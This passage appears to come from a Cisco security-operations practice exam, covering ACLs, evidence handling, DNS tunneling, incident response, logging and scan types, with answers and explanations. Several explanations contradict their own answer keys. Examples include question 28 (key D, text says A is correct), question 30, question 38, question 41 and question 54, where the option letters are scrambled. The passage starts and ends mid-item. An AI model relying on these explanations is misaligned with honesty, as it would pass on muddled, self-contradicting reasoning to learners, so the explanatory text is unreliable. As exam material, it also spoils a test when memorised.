The ACL is applied inbound on the DMZ interface, meaning it filters traffic arriving from the DMZ (10.0.1.0/24) destined for the internal network (10.0.2.0/24). The first line permits TCP traffic from the DMZ to the internal network on port 3306 (MySQL). The second line is an explicit deny all, which blocks any other traffic from the DMZ to the internal network.

Therefore, the ACL allows only MySQL traffic from the DMZ to the internal network and denies everything else.

Exam trap

Cisco often tests the direction of ACL application—candidates frequently mistake inbound vs. outbound filtering, leading them to think the ACL controls traffic from the internal network when it actually controls traffic from the DMZ.

How to eliminate wrong answers

Option A is wrong because the ACL is applied inbound on the DMZ interface, so it controls traffic from the DMZ to the internal network, not from the internal network to the DMZ; MySQL traffic from internal to DMZ would require a different ACL on the internal interface. Option C is wrong because the ACL does not block all traffic; it explicitly permits MySQL (port 3306) traffic from the DMZ to the internal network. Option D is wrong because the ACL does not allow any traffic; it only permits MySQL and then denies all other traffic with the implicit deny any at the end.

28
MCQhard

An investigator seizes a laptop as evidence from a crime scene. At the scene, the laptop is turned on and a log file is open. What should the investigator do to preserve evidence according to chain of custody procedures?

A.Close the log file and copy it to a USB drive
B.Shut down the laptop and remove the hard drive
C.Execute the log file to ensure it is legitimate
D.Photograph the screen and create a forensic image
AnswerD

This captures the current state and preserves the evidence.

Why this answer

Option A is correct because photographing the screen captures the state, and creating a forensic image preserves the data. Option B is wrong because closing the file may alter metadata or memory. Option C is wrong because shutting down may lose volatile data.

Option D is wrong because executing the file could modify evidence.

29
Multi-Selecteasy

Which TWO of the following are common indicators of a denial-of-service (DoS) attack?

Select 2 answers
A.A low level of network utilization on the target server
B.A gradual increase in traffic from multiple geographic locations
C.A high number of DNS queries from diverse source IPs
D.A sudden increase in traffic from a single source IP address
E.A large number of incomplete TCP connections (SYN packets without ACK)
AnswersD, E

This indicates a potential DoS attack from that IP.

Why this answer

Option D is correct because a sudden increase in traffic from a single source IP address is a classic indicator of a direct DoS attack, where the attacker uses a single compromised host to flood the target with packets, overwhelming its resources. This contrasts with a distributed denial-of-service (DDoS) attack, which uses multiple sources. The abrupt spike in volume from one IP is a clear anomaly that network monitoring tools flag as a potential DoS event.

Exam trap

Cisco often tests the distinction between a single-source DoS attack (option D) and a distributed DDoS attack (options B and C), where candidates may confuse the gradual increase from multiple locations as a DoS indicator instead of recognizing it as a DDoS characteristic.

30
MCQhard

A SOC analyst is tuning a correlation rule that detects DNS tunneling. The rule currently generates 500 alerts per day, but only 5% are true positives. Which tuning approach would best reduce false positives while maintaining detection efficacy?

A.Lower the entropy threshold for domain names from 3.5 to 2.0.
B.Disable the rule and rely on manual review of DNS logs.
C.Increase the observation time window from 1 hour to 24 hours.
D.Add a condition that the number of unique domains queried per source IP exceeds 10 per minute.
AnswerD

This threshold helps differentiate tunneling from normal DNS behavior.

Why this answer

Option B is correct because adding a threshold for domain query rate per IP reduces noise from normal high-volume DNS activity. Option A is wrong because increasing the time window may increase false positives. Option C is wrong because decreasing entropy threshold may cause more false positives.

Option D is wrong because disabling the rule loses detection.

31
MCQmedium

A security analyst is investigating an alert that indicates a host is sending a large number of DNS queries to an external domain. The analyst wants to determine if the traffic is malicious and if it is using a DNS tunnel. Which type of analysis should the analyst perform to confirm the presence of a DNS tunnel?

A.Analyze the payload size and query frequency of the DNS packets to detect anomalous patterns.
B.Check the volume of DNS traffic from the host to identify any increase over baseline.
C.Examine the source IP addresses of the DNS queries to see if they originate from multiple hosts.
D.Review the firewall logs to identify any blocked DNS queries to the external domain.
AnswerA

DNS tunneling typically uses large payloads and unusual query patterns.

Why this answer

Option A is correct because DNS tunneling typically involves encoding data within DNS queries or responses, resulting in abnormally large payload sizes and unusual query frequencies. By analyzing these specific packet attributes, an analyst can detect the anomalous patterns characteristic of a DNS tunnel, such as high query rates to a single domain or payloads exceeding standard DNS message sizes (e.g., >512 bytes for UDP). This direct inspection of DNS packet content is the most reliable method to confirm tunneling activity.

Exam trap

Cisco often tests the distinction between detecting a general anomaly (e.g., high traffic volume) and confirming a specific technique (e.g., DNS tunneling), where candidates mistakenly choose a broad indicator like traffic volume (Option B) instead of the packet-level analysis that directly reveals the tunneling mechanism.

How to eliminate wrong answers

Option B is wrong because simply checking the volume of DNS traffic against a baseline may indicate an anomaly but does not specifically confirm a DNS tunnel; legitimate applications (e.g., frequent updates) can also cause increased volume. Option C is wrong because examining source IP addresses to see if queries originate from multiple hosts is more relevant to identifying a distributed attack (e.g., DDoS) or a compromised network segment, not a single-host DNS tunnel. Option D is wrong because reviewing firewall logs for blocked queries only shows which queries were denied, not whether a tunnel exists; a DNS tunnel often uses allowed queries (e.g., to an external domain) and may not be blocked at all.

32
MCQhard

An analyst observes a sudden spike in DNS queries from an internal host to a random subdomain of a legitimate domain (e.g., randomstring.google.com). This behavior is consistent with which technique?

A.DNS tunneling for data exfiltration.
B.HTTP beaconing to a C2 server.
C.DNS amplification attack.
D.Port scanning using DNS.
AnswerA

Uses DNS queries to covertly send data.

Why this answer

The sudden spike in DNS queries to random subdomains of a legitimate domain (e.g., randomstring.google.com) is a classic indicator of DNS tunneling. This technique encodes data into DNS query names and exfiltrates it through the DNS protocol, bypassing network security controls that allow DNS traffic.

Exam trap

Cisco often tests the distinction between DNS tunneling (data exfiltration) and DNS amplification (DDoS attack), so candidates may confuse the high volume of queries in tunneling with the reflection/amplification mechanism of a DDoS attack.

How to eliminate wrong answers

Option B is wrong because HTTP beaconing involves periodic HTTP requests to a C2 server, not a burst of DNS queries to random subdomains. Option C is wrong because a DNS amplification attack uses open resolvers to flood a victim with large DNS responses, not queries from an internal host to a legitimate domain. Option D is wrong because port scanning using DNS would involve querying DNS for SRV or other records to map services, not random subdomain queries for data exfiltration.

33
MCQeasy

A network administrator has configured a SPAN port to send traffic to an intrusion detection system (IDS). However, the IDS is not seeing traffic from a specific VLAN. What is the most likely cause?

A.The SPAN source does not include that VLAN.
B.The IDS interface is set to promiscuous mode.
C.The SPAN destination port is in trunk mode.
D.The IDS is in inline mode.
AnswerA

If the VLAN is not in the SPAN source list, its traffic is not monitored.

Why this answer

A SPAN (Switched Port Analyzer) port copies traffic from specified source interfaces or VLANs to a destination port. If the IDS is not seeing traffic from a specific VLAN, the most likely cause is that the SPAN configuration does not include that VLAN as a source. The administrator must explicitly specify the VLAN(s) to monitor using the `monitor session` command with the `vlan` keyword; otherwise, traffic from that VLAN will not be forwarded to the IDS.

Exam trap

Cisco often tests the misconception that SPAN automatically mirrors all VLANs on a trunk port, when in fact the administrator must explicitly specify which VLANs to monitor using the `vlan` keyword in the SPAN configuration.

How to eliminate wrong answers

Option B is wrong because setting the IDS interface to promiscuous mode is a requirement for the IDS to receive all packets on a SPAN destination, not a cause of missing VLAN traffic. Option C is wrong because the SPAN destination port being in trunk mode is irrelevant; SPAN destination ports are typically access ports or configured as trunk only if needed for encapsulation, but trunk mode does not prevent traffic from a specific VLAN from being seen. Option D is wrong because if the IDS were in inline mode, it would be placed directly in the traffic path and would inherently see all VLAN traffic; the problem described is about a SPAN-based (out-of-band) deployment, so inline mode is not applicable.

34
MCQeasy

What is the primary goal of the 'integrity' pillar of the CIA triad?

A.Keep data secret from unauthorized users
B.Ensure data is accessible when needed
C.Provide proof that a user performed an action
D.Protect data from unauthorized modification
AnswerD

Integrity prevents unauthorized changes.

Why this answer

The 'integrity' pillar of the CIA triad ensures that data is not altered or tampered with by unauthorized parties. This is achieved through mechanisms such as hashing (e.g., SHA-256), checksums, and digital signatures that detect any unauthorized modification. Option D correctly identifies this goal, as protecting data from unauthorized modification is the core purpose of integrity controls.

Exam trap

Cisco often tests the distinction between integrity and non-repudiation, as candidates may confuse 'proof of action' (non-repudiation) with 'data unchanged' (integrity), leading them to incorrectly select Option C.

How to eliminate wrong answers

Option A is wrong because keeping data secret from unauthorized users is the goal of the 'confidentiality' pillar, not integrity. Option B is wrong because ensuring data is accessible when needed is the goal of the 'availability' pillar, not integrity. Option C is wrong because providing proof that a user performed an action is the goal of 'non-repudiation', which is often associated with digital signatures and audit logs, not the integrity pillar itself.

35
MCQmedium

You are analyzing network traffic from a compromised host. The host is running Windows and is connected to a corporate network. The IDS generated an alert for a known malware signature matching traffic from the host to an external IP on port 443. However, you see that the traffic is encrypted and the destination IP is a cloud storage provider. The host also shows periodic DNS queries to a domain that closely resembles the cloud provider's domain but with a single character difference (typosquatting). The employee on that host reports no unusual activity. Which step should you take first to confirm the compromise?

A.Check DNS logs to see if the typosquatted domain resolved recently and correlate with the encrypted traffic timestamps.
B.Dismiss the alert as a false positive because the user reports no issues.
C.Examine the full packet capture for the encrypted session to see the payload.
D.Enable SSL/TLS decryption on the corporate firewall to inspect the encrypted traffic.
AnswerA

DNS logs can show resolution of suspicious domains, indicating potential C2 communication.

Why this answer

Option A is correct because correlating DNS logs with encrypted traffic timestamps is the fastest, least intrusive way to confirm whether the host actually communicated with the typosquatted domain. If the DNS query for the lookalike domain resolved just before the encrypted session to the external IP, it strongly indicates the malware is using the typosquatted domain for command-and-control (C2) over HTTPS, bypassing simple domain-based blocklists. This step validates the alert without requiring decryption or assuming user reports are reliable.

Exam trap

Cisco often tests the misconception that encrypted traffic cannot be analyzed at all, leading candidates to choose decryption (Option D) as the first step, when in fact DNS log correlation is a non-disruptive, immediate method to confirm the compromise.

How to eliminate wrong answers

Option B is wrong because user reports are unreliable in compromise scenarios—malware often runs silently without user-visible symptoms, and dismissing the alert based on user feedback ignores the IDS signature and DNS evidence. Option C is wrong because the traffic is encrypted (TLS/SSL), so examining the full packet capture will only show encrypted payloads; without the session keys, you cannot see the plaintext content. Option D is wrong because enabling SSL/TLS decryption on the corporate firewall is a major operational change that requires policy approval, certificate deployment, and may break certificate pinning; it is not a first step and could alert the malware if it checks for interception.

36
MCQmedium

A security analyst is investigating a potential data exfiltration incident. The analyst notices that a server is sending encrypted data to an external IP address during non-business hours. The server is supposed to only communicate with internal systems. What is the best immediate action?

A.Disconnect the server from the network
B.Block the external IP address at the firewall
C.Notify the server's administrator
D.Capture a packet capture (PCAP) of the traffic for analysis
AnswerA

This immediately stops data transfer, preserving evidence and preventing further loss.

Why this answer

Option A is correct because disconnecting the server from the network immediately stops the potential data exfiltration by severing all communication paths. This is the fastest way to contain the threat and prevent further data loss, aligning with the first step in incident response: containment. In a suspected exfiltration scenario, preserving the system state for forensic analysis is secondary to stopping the active data transfer.

Exam trap

Cisco often tests the principle that containment must precede analysis; the trap here is that candidates choose 'Capture a PCAP' (Option D) because they think evidence collection is the first step, but in an active exfiltration, stopping the data loss is the priority.

How to eliminate wrong answers

Option B is wrong because blocking the external IP address at the firewall only prevents traffic to that specific IP, but the server could still be compromised and may attempt to communicate with other external IPs or use alternate protocols (e.g., DNS tunneling) to exfiltrate data. Option C is wrong because notifying the server's administrator introduces unnecessary delay; the immediate priority is containment, not notification, and the administrator may not be available or may inadvertently alert an insider threat. Option D is wrong because capturing a packet capture (PCAP) of the traffic for analysis is a forensic step that should occur after containment; continuing to allow the traffic to flow while capturing could result in further data loss and gives the attacker more time to complete the exfiltration.

37
MCQhard

A security analyst is responding to an incident on a critical Windows server that hosts a database application. The server is running Windows Server 2019 with all current patches. The analyst suspects that a remote attacker gained access and is using living-off-the-land binaries to move laterally. The analyst has captured a memory dump and a full disk image. The analyst needs to determine if the attacker used PowerShell to download additional tools. Which analysis step should the analyst perform first to identify PowerShell usage?

A.Examine the Windows Registry for Run keys to identify persistence mechanisms.
B.Parse PowerShell operational logs (Event ID 4104) to extract executed scripts and commands.
C.Review prefetch files (.pf) to determine when PowerShell was last executed.
D.Analyze network connection logs to identify outbound connections to known malicious IPs.
AnswerB

PowerShell ScriptBlock logging captures the full script content, directly showing attacker commands.

Why this answer

PowerShell operational logs, specifically Event ID 4104 (Script Block Logging), capture the full text of PowerShell scripts and commands executed on the system. Since the analyst suspects the attacker used PowerShell to download additional tools, parsing these logs is the most direct and efficient first step to confirm that activity. This log source provides the actual commands run, including any download commands like Invoke-WebRequest or Start-BitsTransfer, without relying on indirect artifacts.

Exam trap

Cisco often tests the distinction between artifacts that show execution (prefetch, registry) versus artifacts that capture the actual command or script content (PowerShell operational logs), leading candidates to choose a less direct indicator like prefetch files.

How to eliminate wrong answers

Option A is wrong because examining Windows Registry Run keys focuses on persistence mechanisms (e.g., programs that start automatically), not on identifying whether PowerShell was used to download tools during the incident. Option C is wrong because prefetch files (.pf) only show that PowerShell.exe was launched and when, but they do not reveal the specific commands or scripts executed, so they cannot confirm tool downloads. Option D is wrong because analyzing network connection logs may show outbound connections but does not directly prove PowerShell was the method used; the attacker could have used other tools or protocols, and logs may be incomplete or not capture encrypted traffic.

38
MCQhard

A company's security policy states that all network traffic must be inspected by an IPS. However, encrypted traffic (SSL/TLS) is bypassing inspection. The network team wants to implement SSL decryption. What is the primary policy consideration before implementing?

A.Configure the firewall to block SSL traffic that cannot be decrypted.
B.Notify all users that their traffic will be inspected.
C.Create a certificate authority to issue certificates to all internal servers.
D.Ensure that the SSL decryption device has enough CPU capacity.
E.Obtain legal approval for decryption of user traffic.
AnswerE

Decryption raises privacy and legal issues.

Why this answer

Option B is correct because legal and policy approval for traffic decryption is paramount. Options A, C, E are technical steps after approval. Option D is important but secondary to legal approval.

39
MCQeasy

A network administrator is using Cisco ISE to monitor endpoint authentication. Which report provides details on failed authentication attempts and the reasons?

A.RADIUS Authentication Report
B.Endpoint Profiler Report
C.RADIUS Accounting Report
D.Active Session Report
AnswerA

This report includes details of authentication attempts and failure reasons.

Why this answer

The RADIUS Authentication Report in Cisco ISE specifically logs all authentication attempts, including failures, and provides detailed reasons for each failure (e.g., invalid credentials, user not found, or authorization policy mismatch). This report is the primary tool for troubleshooting failed authentications because it captures the RADIUS Access-Reject messages and the corresponding failure reasons from the ISE policy evaluation.

Exam trap

Cisco often tests the distinction between RADIUS Authentication (which captures failures and reasons) and RADIUS Accounting (which tracks session usage), leading candidates to mistakenly choose the Accounting report when asked about failed authentications.

How to eliminate wrong answers

Option B is wrong because the Endpoint Profiler Report focuses on endpoint classification and profiling (e.g., OS, device type) based on probe data, not on authentication success or failure details. Option C is wrong because the RADIUS Accounting Report tracks session start, stop, and interim updates (e.g., traffic usage, session duration), not authentication failures or their reasons. Option D is wrong because the Active Session Report shows currently active authenticated sessions, not historical failed attempts or the reasons for those failures.

40
Multi-Selectmedium

Which TWO incident types must be reported within 1 hour under the company's incident response policy?

Select 2 answers
A.Unauthorized access
B.Malware outbreak
C.Phishing simulation failure
D.Spam campaign
E.Policy violation
AnswersA, B

Unauthorized access is a security breach requiring immediate action.

Why this answer

Option A (malware outbreak) and Option C (unauthorized access) are critical incidents requiring immediate reporting. Options B, D, and E are less severe and may have longer reporting windows.

41
MCQeasy

An organization wants to ensure that security logs are tamper-proof and available for forensic analysis. Which logging best practice should be implemented?

A.Retain logs for only 30 days to reduce storage costs
B.Forward logs to a centralized, hardened log server with access controls
C.Encrypt logs before sending them to a remote server
D.Store logs locally on each device with read-only permissions
AnswerB

Centralization and access controls improve security and forensics.

Why this answer

Option D is correct because sending logs to a centralized, hardened log server with restricted access is the best practice. Option A is wrong because storing logs locally makes them vulnerable. Option B is wrong because encryption alone doesn't prevent tampering.

Option C is wrong because short retention periods hinder forensics.

42
Multi-Selectmedium

An organization is implementing a security policy that requires all remote access to the corporate network to be authenticated using multi-factor authentication (MFA). Which TWO of the following are valid MFA factors?

Select 2 answers
A.IP address whitelist
B.Smart card
C.Password
D.Fingerprint scan
E.Security question
AnswersB, D

Smart card is a possession factor.

Why this answer

Smart card (Option B) is a valid MFA factor because it falls under the 'something you have' category. Multi-factor authentication requires at least two different categories from 'something you know' (e.g., password), 'something you have' (e.g., smart card, token), and 'something you are' (e.g., biometric). A smart card stores a digital certificate and private key, used for cryptographic authentication, typically requiring a PIN (knowledge factor) to unlock it, thus providing two-factor authentication when combined.

Exam trap

Cisco often tests the distinction between authentication factors and access control lists; the trap here is that candidates mistake an IP address whitelist (a security policy control) for an authentication factor, or think a security question counts as a separate factor when it is merely another form of 'something you know'.

43
MCQmedium

A security policy requires that all mobile devices connecting to corporate email must have a screen lock and be able to be remotely wiped. An employee's personal phone is lost. The employee reports the loss immediately. The phone is enrolled in MDM with remote wipe capability. However, the employee has not set a screen lock, violating policy. The phone contains synced email and contacts. What should the security team do?

A.Remotely wipe the phone immediately.
B.Ask the employee to set a screen lock remotely.
C.Accept the risk since the phone is lost and wipe is possible.
D.Report the violation and suspend the employee's email access until compliance.
AnswerA

This prevents unauthorized access to corporate data.

Why this answer

Option A is correct because remote wipe is the most critical action to protect corporate data. Option B is wrong because wiping should be done; Option C delays protection; Option D is impossible as the phone is lost.

44
MCQeasy

You are a SOC analyst for a school district. The district uses a Cisco Firepower NGFW for traffic inspection and a SIEM for log aggregation. A teacher reports that her workstation is slow and unresponsive. You check the SIEM and see that the workstation (IP 10.1.2.10) has been generating thousands of DNS queries to a domain 'badstuff.example.com' over the past hour. The firewall logs show that the workstation also made many outbound connections to IP 203.0.113.50 on port 80. The DNS queries are for various random subdomains of 'badstuff.example.com'. The school's web filter has no policy for this domain. The user is not technical and cannot explain the behavior. What is the most likely cause and the appropriate first action?

A.Run a full antivirus scan on the workstation
B.Isolate the workstation from the network and add the domain to the block list
C.Update the web filter to block the domain and continue monitoring
D.Ignore the alert because DNS tunneling is not a real threat
AnswerB

Isolation stops the DNS tunneling immediately; blocking the domain prevents future connections.

Why this answer

The workstation is generating thousands of DNS queries for random subdomains of 'badstuff.example.com' and making outbound connections to IP 203.0.113.50 on port 80. This behavior is classic DNS tunneling, where an infected host encodes data in DNS queries to bypass security controls. Isolating the workstation stops the immediate threat and data exfiltration, while adding the domain to the block list prevents further communication from other hosts.

A full antivirus scan is insufficient because DNS tunneling malware often evades signature-based detection and requires network containment first.

Exam trap

Cisco often tests the principle that containment (isolation) is the first priority in an active compromise, not remediation (scanning) or policy updates, and that DNS tunneling is a real exfiltration technique, not a false positive.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan is a reactive step that does not stop ongoing data exfiltration; the malware may be unknown to signature databases, and the immediate priority is network containment. Option C is wrong because updating the web filter to block the domain does not address the already-compromised workstation that is actively tunneling data; the host must be isolated to prevent further damage. Option D is wrong because DNS tunneling is a well-documented exfiltration technique (e.g., using TXT or A record queries) and ignoring it could lead to significant data loss; it is a real threat, especially when combined with outbound HTTP connections to a suspicious IP.

45
MCQmedium

A security analyst wants to monitor file creation events on a critical Windows server without installing additional software. Which Windows audit policy should be configured?

A.Audit Detailed Tracking
B.Audit File System
C.Audit Account Logon
D.Audit Process Creation
AnswerB

Audit File System logs file system operations like create, write, delete.

Why this answer

Audit File System policy is the correct choice because it specifically enables auditing of file creation, modification, and deletion events on NTFS volumes. By configuring this policy under Advanced Audit Policy in Windows, the security analyst can monitor file creation events on the critical server without requiring any third-party software, as the events are logged to the Windows Security log with Event ID 4663.

Exam trap

Cisco often tests the distinction between 'Audit File System' (file-level operations) and 'Audit Detailed Tracking' (process-level operations), causing candidates to confuse file creation with process creation events.

How to eliminate wrong answers

Option A is wrong because Audit Detailed Tracking focuses on process creation, termination, and handle duplication events (e.g., Event ID 4688), not file creation events. Option C is wrong because Audit Account Logon monitors authentication events against domain controllers or local SAM (e.g., Event ID 4624), not file system operations. Option D is wrong because Audit Process Creation logs when a process is created or starts (Event ID 4688), which does not capture file creation events on the file system.

46
MCQhard

An analyst is reviewing Sysmon logs on a Windows host and sees Event ID 1 (process creation) with a signed parent process but an unsigned child. The child has a CommandLine that includes 'powershell -EncodedCommand'. What is the most likely threat?

A.PowerShell-based malware using encoded commands to evade detection
B.Privilege escalation attempt
C.Process hollowing attack
D.Phishing email attachment
AnswerA

Encoded commands are a common obfuscation technique in PowerShell attacks.

Why this answer

Event ID 1 with a signed parent process and an unsigned child using 'powershell -EncodedCommand' strongly indicates PowerShell-based malware. Attackers use Base64-encoded commands to obfuscate malicious actions and bypass simple string-based detection, as the encoded payload is decoded and executed by PowerShell at runtime.

Exam trap

Cisco often tests the distinction between execution indicators (like encoded PowerShell commands) and other attack stages (like privilege escalation or process hollowing), leading candidates to confuse a common obfuscation technique with a different attack type.

How to eliminate wrong answers

Option B is wrong because privilege escalation typically involves exploiting vulnerabilities to gain higher privileges, not simply executing an encoded PowerShell command from a signed parent. Option C is wrong because process hollowing replaces the memory of a legitimate process with malicious code, which would not manifest as a child process with an encoded PowerShell command. Option D is wrong because a phishing email attachment is a delivery vector, not a direct threat indicator; the Sysmon log shows execution, not the initial infection method.

47
MCQmedium

Which security principle ensures that a user cannot deny having performed an action?

A.Availability
B.Confidentiality
C.Non-repudiation
D.Integrity
AnswerC

Non-repudiation provides undeniable evidence.

Why this answer

Non-repudiation ensures that a user cannot deny having performed an action, typically by using cryptographic mechanisms such as digital signatures or audit logs. In network security, this is often implemented through protocols like PKI (Public Key Infrastructure) where a sender signs data with their private key, and the receiver verifies it with the corresponding public key, providing irrefutable proof of origin.

Exam trap

Cisco often tests the distinction between integrity and non-repudiation, where candidates mistakenly choose integrity because they associate hashing with proof of origin, but integrity only verifies data has not changed, not who sent it.

How to eliminate wrong answers

Option A is wrong because availability ensures that systems and data are accessible when needed, often through redundancy and fault tolerance, but it does not prevent denial of actions. Option B is wrong because confidentiality protects data from unauthorized disclosure via encryption or access controls, but it does not provide proof of who performed an action. Option D is wrong because integrity ensures that data has not been altered in transit or at rest, typically via hashing or checksums, but it does not tie an action to a specific user in a non-repudiable way.

48
MCQhard

During incident response, a security analyst reviews a PCAP file and sees TCP packets with only the SYN flag set, followed by RST packets upon receiving a SYN-ACK. No connection is established. Which scanning technique is being used?

A.Half-open scan (SYN scan)
B.FIN scan
C.Christmas tree scan
D.Full connect scan
AnswerA

Half-open scan sends SYN, receives SYN-ACK, then RST to avoid detection.

Why this answer

The described behavior—sending a SYN packet, receiving a SYN-ACK, and immediately replying with an RST—is the hallmark of a half-open (SYN) scan. This technique never completes the three-way handshake, so the target does not log an established connection, making it stealthier than a full connect scan. The RST sent after the SYN-ACK terminates the handshake before it can be fully established, confirming the port is open without creating a full session.

Exam trap

Cisco often tests the distinction between a half-open scan and a full connect scan by focusing on whether the three-way handshake is completed; the trap here is that candidates may confuse the RST sent after SYN-ACK as part of a normal connection teardown, rather than recognizing it as the defining characteristic of a SYN scan that never completes the handshake.

How to eliminate wrong answers

Option B (FIN scan) is wrong because a FIN scan sends a packet with only the FIN flag set, expecting an RST from closed ports and no response from open ports; it does not involve SYN or SYN-ACK exchanges. Option C (Christmas tree scan) is wrong because it sends packets with the FIN, URG, and PSH flags set (a 'lit-up' combination), not just the SYN flag, and relies on different responses from open vs. closed ports per RFC 793. Option D (Full connect scan) is wrong because it completes the full three-way handshake (SYN, SYN-ACK, ACK) before sending an RST to close the connection, whereas the scenario shows an RST sent immediately after the SYN-ACK, before the final ACK.

49
MCQmedium

Refer to the exhibit. A security analyst observes a SIEM alert and a firewall log. The firewall allowed the traffic. According to the company's security policy, which action should the analyst take first?

A.Check if the firewall blocked the traffic.
B.Investigate the user's recent activity.
C.Ignore the alert as it is a false positive.
D.Create a firewall rule to block the source IP.
AnswerD

Immediate containment by blocking the IP is appropriate.

Why this answer

The correct answer is D because the firewall log shows the traffic was allowed, and the SIEM alert indicates a security event. According to the security policy, the immediate action is to block the source IP to prevent further potential malicious activity. Creating a firewall rule to block the source IP is a direct and effective response to mitigate the threat.

Exam trap

Cisco often tests the candidate's ability to prioritize containment over investigation, leading them to mistakenly choose 'investigate the user's recent activity' instead of immediately blocking the malicious source IP.

How to eliminate wrong answers

Option A is wrong because the firewall log explicitly shows the traffic was allowed, so checking if it was blocked is redundant and wastes time. Option B is wrong because while investigating user activity may be necessary later, the first priority under the security policy is to contain the threat by blocking the source IP. Option C is wrong because the SIEM alert and firewall log together indicate a real security event, not a false positive, so ignoring it would violate security policy.

50
MCQhard

A security team implements an IPS that uses behavioral profiling. Which type of detection method is being used?

A.Heuristic
B.Signature-based
C.Rule-based
D.Anomaly-based
AnswerD

Behavioral profiling defines normal behavior and detects anomalies.

Why this answer

Behavioral profiling establishes a baseline of normal network traffic patterns and then flags deviations from that baseline as potential threats. This is the core mechanism of anomaly-based detection, which identifies malicious activity by comparing observed behavior against a learned model of normal behavior rather than against predefined signatures or rules.

Exam trap

Cisco often tests the distinction between anomaly-based and heuristic detection, where candidates mistakenly choose heuristic because both involve 'behavior' or 'profiling,' but heuristic relies on predefined rules of thumb while anomaly-based relies on a learned baseline of normal behavior.

How to eliminate wrong answers

Option A is wrong because heuristic detection uses algorithms or rules of thumb to identify suspicious behavior based on general characteristics, not by learning and comparing against a baseline of normal behavior. Option B is wrong because signature-based detection relies on predefined patterns (e.g., byte sequences or known exploit payloads) to match known threats, not on behavioral profiling. Option C is wrong because rule-based detection uses static, manually defined rules (e.g., 'if port 445 and SMB traffic, then alert') rather than dynamically learned behavioral baselines.

51
Multi-Selecteasy

An organization's security policy defines acceptable use of corporate email. Which THREE of the following actions are typically prohibited?

Select 3 answers
A.Using email to subscribe to personal newsletters.
B.Emailing the IT support for assistance.
C.Sending personal emails using the corporate account.
D.Forwarding corporate emails to personal external accounts.
E.Using email to send sensitive customer data without encryption.
AnswersC, D, E

Often restricted to incidental use only.

Why this answer

Options A, B, and C are typically prohibited. Option A: personal emails are often restricted. Option B: forwarding to personal accounts raises data loss risk.

Option C: sending sensitive data unencrypted violates policy. Option D: emailing IT support is allowed. Option E: subscribing to newsletters is often discouraged but not always prohibited; however, here it is not selected.

52
Multi-Selecthard

Which three steps are part of the network intrusion analysis process according to Cisco best practices?

Select 3 answers
A.Collection
B.Detection
C.Prevention
D.Analysis
E.Remediation
AnswersA, B, D

Collecting data from network sources is the first step.

Why this answer

Collection is correct because the network intrusion analysis process begins with gathering raw data from sources such as NetFlow, syslogs, and packet captures (PCAP). This step ensures that all relevant evidence is preserved for subsequent detection and analysis, aligning with Cisco's best practices for incident response.

Exam trap

Cisco often tests the distinction between the analysis process steps and adjacent security functions (prevention, remediation) to see if candidates confuse the reactive analysis workflow with proactive or corrective actions.

53
Multi-Selecteasy

A security analyst is creating a procedure for responding to a phishing email reported by a user. Which TWO steps should be included?

Select 2 answers
A.Delete the email from the user's inbox remotely.
B.Ask the user to forward the original email to the security team.
C.Immediately block the sender's email address at the gateway.
D.Require the user to change their password.
E.Investigate if any other users received similar emails.
AnswersC, E

Blocking prevents further phishing attempts from that sender.

Why this answer

Blocking the sender (B) and investigating if others received similar emails (D) are standard initial steps. Forwarding original email (A) may alter headers; deleting remotely (C) is not always possible or needed; password change (E) is premature without evidence of compromise.

54
Multi-Selecthard

A company's security policy requires that all changes to firewall rules must be approved by the change advisory board (CAB). Which THREE of the following are valid reasons to bypass this process?

Select 3 answers
A.Removing a rule for a decommissioned application during maintenance.
B.Adding a new server to the DMZ for a planned project.
C.Troubleshooting a network connectivity issue causing downtime.
D.Implementing a temporary rule for a scheduled penetration test.
E.Critical security vulnerability zero-day exploit requiring immediate block.
AnswersC, D, E

Restoring service during an outage is often allowed as an emergency change.

Why this answer

Emergency fixes for critical vulnerabilities (A), connectivity issues causing downtime (C), and pre-approved penetration tests (D) are common exceptions. Planned additions (B) and removals (E) should follow standard change management.

55
MCQmedium

During a security incident, a security analyst isolates an affected host and collects a memory dump. According to incident response procedures, what is the next step the analyst should take?

A.Reboot the host to clear any malware from memory
B.Notify the public relations team immediately
C.Restore the host from a known good backup
D.Analyze the memory dump to identify indicators of compromise
AnswerD

Analysis is the logical next step after data collection to determine the cause and extent.

Why this answer

Option A is correct because after containment (isolation) and data collection (memory dump), the next step is analysis to understand the scope and impact. Option B is premature before analysis. Option C is not a standard incident response step.

Option D happens after analysis and eradication.

56
MCQmedium

An analyst reviews the Cisco ASA syslog message shown in the exhibit. What does this entry indicate?

A.A successful HTTP connection from the outside to the inside server
B.A VPN tunnel initiation that was rejected due to authentication failure
C.An attempted connection from an external host to an internal web server that was blocked by the firewall
D.A NAT translation failure for an outbound connection
AnswerC

Correctly describes the denied inbound TCP connection to port 80.

Why this answer

The syslog message shows a deny action for an HTTP connection (port 80) from an external IP (outside) to an internal IP (inside). The '%ASA-4-106023' message indicates a packet was denied by the firewall's access control list (ACL). This matches the scenario of an attempted external-to-internal web connection being blocked, which is option C.

Exam trap

Cisco often tests the ability to distinguish between different syslog message IDs (e.g., 106023 for ACL denies vs. 305006 for NAT failures) and to correctly interpret the 'Deny' keyword as a block, not a successful connection.

How to eliminate wrong answers

Option A is wrong because the syslog explicitly says 'Deny', not 'Allow', so a successful HTTP connection is not indicated. Option B is wrong because VPN tunnel initiation failures are typically logged with different syslog IDs (e.g., 713228 for IKE failure) and involve authentication or phase-1/phase-2 errors, not a simple TCP deny on port 80. Option D is wrong because NAT translation failures generate syslog messages like '%ASA-3-305006' for 'no translation group found', not a deny action on a specific port/protocol.

57
MCQeasy

A security analyst is investigating a suspected malware infection on a Windows host. The analyst wants to identify processes that have network connections. Which built-in Windows tool should the analyst use?

A.netstat
B.ipconfig
C.tasklist
D.nslookup
AnswerA

netstat shows active connections and listening ports with associated process IDs.

Why this answer

Netstat (network statistics) is the correct built-in Windows tool for displaying active TCP and UDP connections, listening ports, and the associated process IDs (PIDs). By using netstat with the `-b` or `-o` flag, the analyst can map each network connection to its owning process, which is essential for identifying suspicious processes communicating over the network.

Exam trap

Cisco often tests the distinction between tools that show process lists (tasklist) and tools that show network connections (netstat), trapping candidates who confuse 'process enumeration' with 'network connection enumeration'.

How to eliminate wrong answers

Option B (ipconfig) is wrong because it displays IP configuration details such as IP address, subnet mask, and default gateway, but it does not show active network connections or the processes using them. Option C (tasklist) is wrong because it lists running processes and their memory usage, but it does not reveal which processes have open network sockets or connections. Option D (nslookup) is wrong because it is a DNS query tool used to resolve domain names to IP addresses or perform reverse lookups, and it provides no information about local processes or their network connections.

58
MCQmedium

